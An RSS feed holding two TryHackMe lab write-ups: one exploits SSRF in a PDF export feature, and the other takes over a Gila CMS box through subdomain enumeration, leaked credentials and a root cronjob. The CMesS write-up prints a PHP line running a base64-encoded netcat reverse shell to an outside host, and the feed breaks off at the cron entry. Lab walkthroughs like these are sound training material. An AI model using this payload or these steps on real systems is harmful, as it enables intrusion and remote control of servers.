<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Laach_</title>
    <description>The latest articles on DEV Community by Laach_ (@laach_).</description>
    <link>https://dev.to/laach_</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3981493%2F01a01b2e-2506-478b-8151-59722908ae9f.png</url>
      <title>DEV Community: Laach_</title>
      <link>https://dev.to/laach_</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/laach_"/>
    <language>en</language>
    <item>
      <title>Surfer - THM</title>
      <dc:creator>Laach_</dc:creator>
      <pubDate>Mon, 15 Jun 2026 22:02:37 +0000</pubDate>
      <link>https://dev.to/laach_/surfer-thm-369p</link>
      <guid>https://dev.to/laach_/surfer-thm-369p</guid>
      <description>&lt;h2&gt;
  
  
  Machine Info
&lt;/h2&gt;

&lt;p&gt;Difficulty: Easy🟩&lt;br&gt;
Link:&amp;nbsp;&lt;a href="https://tryhackme.com/room/surfer" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;br&gt;
Avg time: 35 Minutes&lt;br&gt;
OS: Linux&lt;/p&gt;

&lt;p&gt;Description:&amp;nbsp;&lt;code&gt;Surf some internal webpages to find the flag!&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Recon
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;We're told to go straight at website so no nmap scan is needed&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;On website there is just login page nothing interesting in source code so Ferox at beginning&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;feroxbuster &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;'http://10.114.163.12'&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;-C&lt;/span&gt; 404 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;200      GET        8l       63w      365c http://10.114.163.12/backup/chat.txt
200      GET      319l      837w     9266c http://10.114.163.12/assets/js/main.js
200      GET        6l       17w     1040c http://10.114.163.12/assets/img/logo.png
200      GET        8l       17w      840c http://10.114.163.12/assets/img/favicon.png
200      GET      173l      366w     3067c http://10.114.163.12/assets/vendor/simple-datatables/style.css
200      GET        7l       32w     1862c http://10.114.163.12/assets/img/apple-touch-icon.png
200      GET       85l      210w     2731c http://10.114.163.12/assets/vendor/php-email-form/validate.js
200      GET      952l     2306w    25273c http://10.114.163.12/assets/vendor/quill/quill.bubble.css
200      GET     1084l     2366w    21109c http://10.114.163.12/assets/css/style.css
200      GET      945l     2297w    24743c http://10.114.163.12/assets/vendor/quill/quill.snow.css
200      GET        7l     1031w    78129c http://10.114.163.12/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
200      GET       12l      528w    37864c http://10.114.163.12/assets/vendor/simple-datatables/simple-datatables.js
200      GET        1l      133w    65758c http://10.114.163.12/assets/vendor/boxicons/css/boxicons.min.css
200      GET     1556l     7713w    73271c http://10.114.163.12/assets/vendor/bootstrap-icons/bootstrap-icons.css
200      GET        7l     2006w   163873c http://10.114.163.12/assets/vendor/bootstrap/css/bootstrap.min.css
200      GET     2317l    11522w   110438c http://10.114.163.12/assets/vendor/remixicon/remixicon.css
200      GET       13l     2708w   194890c http://10.114.163.12/assets/vendor/chart.js/chart.min.js
200      GET        8l     5631w   216333c http://10.114.163.12/assets/vendor/quill/quill.min.js
200      GET        9l     7014w   391863c http://10.114.163.12/assets/vendor/tinymce/tinymce.min.js
200      GET       45l    13299w  1012551c http://10.114.163.12/assets/vendor/echarts/echarts.min.js
200      GET       14l     6109w   488297c http://10.114.163.12/assets/vendor/apexcharts/apexcharts.min.js
200      GET     6135l    12251w   183063c http://10.114.163.12/assets/vendor/bootstrap-icons/
200      GET      113l      291w     4774c http://10.114.163.12/login.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;I got lucky and guessed credentials in first try, but feroxbuster is shown here as good practice&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Found &lt;code&gt;backup/chat.txt&lt;/code&gt; , it contained a chat log.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Admin: I have finished setting up the new export2pdf tool.
Kate: Thanks, we will require daily system reports in pdf format.
Admin: Yes, I am updated about that.
Kate: Have you finished adding the internal server.
Admin: Yes, it should be serving flag from now.
Kate: Also Don't forget to change the creds, plz stop using your username as password.
Kate: Hello.. ?
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This reveals the &lt;code&gt;export2pdf&lt;/code&gt; functionality and admin credentials: &lt;code&gt;admin:admin&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Exploiting SSRF
&lt;/h2&gt;

&lt;p&gt;As this room is SSRF targeted so i'll simply explain what SSRF is.&lt;/p&gt;

&lt;p&gt;SSRF (Server-Side Request Forgery) tricks the server into making requests for you. This way you can reach internal resources like localhost or internal network servers that normally aren't accessible from the outside.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3bghcmsnrprnx45e5b50.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3bghcmsnrprnx45e5b50.png" alt="SSRF CHART" width="530" height="232"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Where unexpected destination is localhost or some server from internal network. To learn about all kinds of web security go on &lt;a href="https://portswigger.net/web-security/all-topics" rel="noopener noreferrer"&gt;Portswigger Academy&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After logging in there is a dashboard with some dummy data but there are two important pieces of info in &lt;code&gt;Recent Activity&lt;/code&gt; and &lt;code&gt;Reports&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;Recent Activity&lt;/code&gt; contains information:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Internal pages hosted at&amp;nbsp;/internal/admin.php. It contains the system flag.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Trying to visit this URL it returns&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;This page can only be accessed locally.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;Reports&lt;/code&gt; got more interesting data about &lt;code&gt;Hosting Server Information&lt;/code&gt; such as OS , IP or Hostname and more. Under this data there is an &lt;code&gt;Export to PDF&lt;/code&gt; option. After clicking it, the request goes to &lt;code&gt;export2pdf.php&lt;/code&gt; , looking in Burp this endpoint takes a &lt;code&gt;url&lt;/code&gt; parameter.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;http%3A%2F%2F127.0.0.1%2Fserver-info.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It's URL-encoded. After decoding it decodes to&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;url=http://127.0.0.1/server-info.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Changing this value to&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;url=http://127.0.0.1/internal/admin.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and using Burp's &lt;code&gt;RMB -&amp;gt; Request in browser -&amp;gt; In current browser session&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl9nt9csnvew7flu01v33.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl9nt9csnvew7flu01v33.png" alt="burp" width="625" height="162"&gt;&lt;/a&gt;&lt;br&gt;
Copy the URL paste it in browser and there will be beautiful response with flag. &lt;/p&gt;

&lt;p&gt;In this case server fetched provided URL and exported it to PDF even the files that are supposed to be internal only. That's how SSRF works.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>tutorial</category>
      <category>linux</category>
      <category>ctf</category>
    </item>
    <item>
      <title>CMesS - THM</title>
      <dc:creator>Laach_</dc:creator>
      <pubDate>Mon, 15 Jun 2026 13:45:43 +0000</pubDate>
      <link>https://dev.to/laach_/cmess-thm-dld</link>
      <guid>https://dev.to/laach_/cmess-thm-dld</guid>
      <description>&lt;h2&gt;
  
  
  Machine Info
&lt;/h2&gt;

&lt;p&gt;Difficulty: Medium🟧&lt;br&gt;
Link:&amp;nbsp;&lt;a href="https://tryhackme.com/room/cmess" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;br&gt;
Avg time: 75 Minutes&lt;br&gt;
OS: Linux&lt;/p&gt;

&lt;p&gt;Description:&amp;nbsp;&lt;code&gt;Can you root this Gila CMS box?&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Recon
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: Before &lt;code&gt;nmap&lt;/code&gt; we are told to add &lt;code&gt;[IP] cmess.thm&lt;/code&gt; to &lt;code&gt;/etc/hosts&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Casually &lt;code&gt;nmap&lt;/code&gt; scan&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap cmess.thm &lt;span class="nt"&gt;-Pn&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="nt"&gt;-O&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; scan.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Starting Nmap 7.99 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org &lt;span class="o"&gt;)&lt;/span&gt; at 2026-06-15 13:54 +0200
Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;cmess.thm &lt;span class="o"&gt;(&lt;/span&gt;10.114.129.136&lt;span class="o"&gt;)&lt;/span&gt;
Host is up &lt;span class="o"&gt;(&lt;/span&gt;0.028s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
Not shown: 65533 closed tcp ports &lt;span class="o"&gt;(&lt;/span&gt;reset&lt;span class="o"&gt;)&lt;/span&gt;
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu Linux&lt;span class="p"&gt;;&lt;/span&gt; protocol 2.0&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-hostkey: 
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f &lt;span class="o"&gt;(&lt;/span&gt;RSA&lt;span class="o"&gt;)&lt;/span&gt;
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b &lt;span class="o"&gt;(&lt;/span&gt;ECDSA&lt;span class="o"&gt;)&lt;/span&gt;
|_  256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed &lt;span class="o"&gt;(&lt;/span&gt;ED25519&lt;span class="o"&gt;)&lt;/span&gt;
80/tcp open  http    Apache httpd 2.4.18 &lt;span class="o"&gt;((&lt;/span&gt;Ubuntu&lt;span class="o"&gt;))&lt;/span&gt;
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-title: Site doesn&lt;span class="s1"&gt;'t have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Gila CMS
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=6/15%OT=22%CT=1%CU=42629%PV=Y%DS=3%DC=I%G=Y%TM=6A2FE82
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=102%GCD=1%ISR=10F%TI=Z%CI=I%II=I%TS=8)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%
OS:CI=I%II=I%TS=8)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ(SP=FC%GC
OS:D=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E
OS:8NNT11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=68DF%W2=68DF%
OS:W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M4E8NNSNW7%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=
OS:G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.60 seconds

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Scan reveals:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;22/tcp - SSH&lt;/li&gt;
&lt;li&gt;80/tcp - HTTP&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;HTTP got &lt;code&gt;robots.txt&lt;/code&gt; with 3 entries: &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;src/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;themes/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;lib/&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Shell as www-data
&lt;/h2&gt;

&lt;p&gt;My first thought was to visit &lt;code&gt;src/&lt;/code&gt; it did redirect to something looking like potential LFI&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faut9qi1vqlyhocqbjhtb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faut9qi1vqlyhocqbjhtb.png" alt="LFI url"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But no matter what I tried I couldn't retrieve &lt;code&gt;/etc/passwd&lt;/code&gt; either RFI didn't worked too. &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;Other entries in &lt;code&gt;robots.txt&lt;/code&gt; were the same I tested them but nothing&lt;/em&gt;  &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Later I tried running &lt;code&gt;Feroxbuster&lt;/code&gt; there were some not usual files and directories&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt; &lt;span class="nb"&gt;sudo &lt;/span&gt;feroxbuster &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;'http://cmess.thm/'&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;-C&lt;/span&gt; 404
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;403      GET        9l       28w      274c http://cmess.thm/lib/?url&lt;span class="o"&gt;=&lt;/span&gt;lib
403      GET        9l       28w      274c http://cmess.thm/src/?url&lt;span class="o"&gt;=&lt;/span&gt;src
403      GET        9l       28w      274c http://cmess.thm/themes/?url&lt;span class="o"&gt;=&lt;/span&gt;themes
200      GET      107l      290w     3851c http://cmess.thm/index
200      GET       44l      113w     1605c http://cmess.thm/src/core/assets/lazyImgLoad.js
200      GET       43l       98w     1360c http://cmess.thm/login/password_reset
200      GET      799l     1024w    15763c http://cmess.thm/lib/gila.min.css
200      GET        4l       66w    31000c http://cmess.thm/lib/font-awesome/css/font-awesome.min.css
200      GET       92l      266w     3353c http://cmess.thm/about
200      GET       68l      422w    25046c http://cmess.thm/assets/gila-logo.png
200      GET      107l      290w     3851c http://cmess.thm/search
200      GET      107l      290w     3851c http://cmess.thm/blog
200      GET       41l       99w     1580c http://cmess.thm/login
200      GET      109l      291w     3862c http://cmess.thm/category
200      GET      102l      308w     4078c http://cmess.thm/1/hello_world
200      GET      107l      290w     3865c http://cmess.thm/
200      GET      102l      308w     4078c http://cmess.thm/1
200      GET        1l        4w       68c http://cmess.thm/login/register
200      GET       21l       42w      735c http://cmess.thm/feed
200      GET      107l      290w     3851c http://cmess.thm/0
200      GET      101l      272w     3590c http://cmess.thm/author
200      GET      102l      308w     4078c http://cmess.thm/01
200      GET      109l      292w     3874c http://cmess.thm/tag
200      GET      107l      290w     3851c http://cmess.thm/Search
200      GET       92l      266w     3339c http://cmess.thm/About
200      GET      107l      290w     3851c http://cmess.thm/Index
200      GET        0l        0w        0c http://cmess.thm/api
200      GET        1l        4w       68c http://cmess.thm/login/Register
200      GET       14l       40w      563c http://cmess.thm/assets/?url&lt;span class="o"&gt;=&lt;/span&gt;assets
500      GET        0l        0w        0c http://cmess.thm/cm
200      GET        0l        0w        0c http://cmess.thm/fm
200      GET      107l      290w     3851c http://cmess.thm/INDEX
200      GET        0l        0w        0c http://cmess.thm/login/callback
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There were some weird outputs but most of them were not found or main page. Only thing that caught my attention was possible IDOR.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://cmess.thm/0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It was returning home page with post that contained title and body of it. but&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://cmess.thm/1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;returned title, &lt;code&gt;posted by&lt;/code&gt; and body but &lt;code&gt;posted by&lt;/code&gt; was empty which was weird. I did tried other numbers such as 2, 3, 4 but they returned not found so it was a rabbit hole. Ferox also revealed path &lt;code&gt;/login/register&lt;/code&gt; but it redirected to 404 — another rabbit hole. I also tried brute force on &lt;code&gt;login/&lt;/code&gt; with guessed email &lt;code&gt;admin@cmess.thm&lt;/code&gt; but after 3 tries I got rate limited — another rabbit hole. This whole page seemed like a dead end so I tried subdomain enum with &lt;code&gt;ffuf&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ffuf &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;'http://cmess.thm'&lt;/span&gt; &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Host: FUZZ.cmess.thm"&lt;/span&gt; &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt &lt;span class="nt"&gt;-fw&lt;/span&gt; 522 &lt;span class="nt"&gt;-c&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This finally gave some serious lead&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://cmess.thm
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.cmess.thm
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 522
________________________________________________

dev                     [Status: 200, Size: 934, Words: 191, Lines: 31, Duration: 4663ms]
:: Progress: [4989/4989] :: Job [1/1] :: 295 req/sec :: Duration: [0:00:17] :: Errors: 0 ::
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Adding &lt;code&gt;dev.cmess.thm&lt;/code&gt; to &lt;code&gt;/etc/hosts&lt;/code&gt; and visiting it revealed a black page with a Development Log containing credentials for &lt;code&gt;andre@cmess.thm&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;&lt;span class="gu"&gt;## Development Log&lt;/span&gt;

&lt;span class="gu"&gt;### andre@cmess.thm&lt;/span&gt;

Have you guys fixed the bug that was found on live?

&lt;span class="gu"&gt;### support@cmess.thm&lt;/span&gt;

Hey Andre, We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!

&lt;span class="gu"&gt;### support@cmess.thm&lt;/span&gt;

Update! We have had to delay the patch due to unforeseen circumstances

&lt;span class="gu"&gt;### andre@cmess.thm&lt;/span&gt;

That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.

&lt;span class="gu"&gt;### support@cmess.thm&lt;/span&gt;

Your password has been reset. Here: KPFTN_f2yxe%
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Credentials worked. There was a CMS dashboard with page editing functionality. In most CMS dashboards, if page editing is available, getting a shell is trivial. At &lt;code&gt;/admin/fm&lt;/code&gt; there is a list of files and directories. Editing &lt;code&gt;index.php&lt;/code&gt; can give a shell. &lt;a href="https://github.com/brightio/penelope" rel="noopener noreferrer"&gt;Penelope&lt;/a&gt; was used as it handles and stabilizes the shell automatically.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;In this file list there was an interesting file &lt;code&gt;config.php&lt;/code&gt; containing root credentials for MySQL, maybe useful for later.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Code injected into &lt;code&gt;index.php&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'printf KHJtIC90bXAvXztta2ZpZm8gL3RtcC9fO2NhdCAvdG1wL198c2ggMj4mMXxuYyAxOTIuMTY4LjEzMS45MSA0NDQ0ID4vdG1wL18pID4vZGV2L251bGwgMj4mMSAm|base64 -d|sh'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After saving and visiting the main page, Penelope catches a shell as &lt;code&gt;www-data&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as Andre
&lt;/h2&gt;

&lt;p&gt;Password reuse from the login page was attempted but didn't work. &lt;a href="https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS" rel="noopener noreferrer"&gt;linpeas&lt;/a&gt; and &lt;a href="https://github.com/dominicbreuker/pspy" rel="noopener noreferrer"&gt;pspy64&lt;/a&gt; were transferred to the target. pspy64 revealed a cronjob running as root every 2 minutes but it wasn't investigated further at this point.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;The cronjob wasn't investigated because write access to &lt;code&gt;/home/andre&lt;/code&gt; was required.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;linpeas kept crashing so manual enumeration was done. MySQL was checked using the credentials found earlier but nothing useful was found. Eventually &lt;code&gt;/opt&lt;/code&gt; was checked — an obvious privesc path that was missed earlier due to linpeas issues. Inside was &lt;code&gt;.password.bak&lt;/code&gt; with Andre's password.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;www-data@cmess:/opt$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-al&lt;/span&gt;
&lt;span class="go"&gt;total 12
drwxr-xr-x  2 root root 4096 Feb  6  2020 .
drwxr-xr-x 22 root root 4096 Feb  6  2020 ..
-rwxrwxrwx  1 root root   36 Feb  6  2020 .password.bak
&lt;/span&gt;&lt;span class="gp"&gt;www-data@cmess:/opt$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; .password.bak
&lt;span class="go"&gt;andres backup password
UQfsdCB7aAP6
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Flag located at: &lt;code&gt;/home/andre/user.txt&lt;/code&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as Root
&lt;/h2&gt;

&lt;p&gt;The root cronjob was performing a backup of every file in &lt;code&gt;/home/andre/backup&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;*&lt;/span&gt;/2 &lt;span class="k"&gt;*&lt;/span&gt;   &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt;   root    &lt;span class="nb"&gt;cd&lt;/span&gt; /home/andre/backup &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;tar&lt;/span&gt; &lt;span class="nt"&gt;-zcf&lt;/span&gt; /tmp/andre_backup.tar.gz &lt;span class="k"&gt;*&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



